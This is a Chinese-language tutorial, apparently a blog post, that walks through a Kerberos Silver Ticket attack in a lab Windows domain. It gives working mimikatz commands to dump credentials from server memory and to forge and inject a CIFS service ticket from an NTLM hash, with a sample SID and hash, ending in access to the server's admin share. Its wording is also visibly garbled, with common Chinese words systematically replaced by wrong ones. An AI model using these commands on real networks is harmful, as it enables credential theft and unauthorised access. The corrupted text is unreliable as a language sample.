域渗透 | 白银票据利用

目录

0x01 介绍

0x02 白银票据利用

0x01 介绍

以前，咱们已经详细说过Kerberos认证的流程，此次咱们就来讲说如何对其进行利用，此次主要说的是白银票据伪造（Silver Tickets）

白银票据伪造利用的是Kerberos认证中的第三个步骤，在第三步的时候，client会带着ticket向server的某个服务进行请求，若是验证经过就能够访问server上的指定服务了，这里ticket的格式是这样的：

Server hash(server session key + client info + end time)

其中client info咱们是很清楚的，end time也能够根据本身当前的时间进行伪造，server session key是TGS生成的，在未向server发送ticket的时候，server也是不知道server session key是什么的，因此只要咱们知道server hash就能够去访问server中的指定服务了。

其实与其说这是一种利用方式，倒不如说这是一个后门，在拥有server hash的时候，能够随时去请求server。

根据上面的攻击流程总结如下白银票据的攻击特色：

1.不须要与KDC进行交互

2.须要server的NTLM hash

0x02 白银票据利用

DC 192.168.6.112

Client 192.168.6.113
WIN7-CLIENT.zhujian.com

Server 192.168.6.114
WIN7-SERVER.zhujian.com

这里咱们使用文件共享的方式来进行验证

输入\\WIN7-SERVER.zhujian.com\c$进行验证

发现须要输入密码才能进行链接

而后咱们使用mimikatz去Server中导出hash

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt

能够发现已经获取到了hash等各类信息

而后回到client中使用mimikatz来伪造票据

命令以下

mimikatz "kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLMHash> /user:<用户名> /ptt" exit

其中的信息能够这样得到

SID不须要填最后的 -500

注：这里的目标服务器主机名不能用这里hostname的内容，而是要写全称

服务类型能够从如下内容中来进行选择，由于咱们没有TGT去不断申请ticket，因此只能针对某一些服务来进行伪造

其中的用户名能够随便写，这个是不受影响的，由于在数据传过去以前server是不知道用户名的，对于传输流程还不太熟悉的，能够移步《Windows认证 | 域认证》

因此最后获得的信息是这样的

mimikatz.exe "kerberos::golden /domain:zhujian.com /sid:S-1-5-21-829259175-2571685386-1296789624 /target: WIN7-SERVER.zhujian.com /service:cifs /rc4:e467173f3c80e9f23084396625486f60 /user: secquan /ptt" exit

而后再一次进行测试

已经能够成功访问了

若是对Windows认证有兴趣的能够看一下下面的几篇文章来学习一下《Windows认证 | Windows本地认证》、《Windows认证 | 网络认证》、《Windows认证 | 域认证》、《SPN扫描》、《Kerberoasting攻击》

本文由博客一文多发平台 OpenWrite 发布！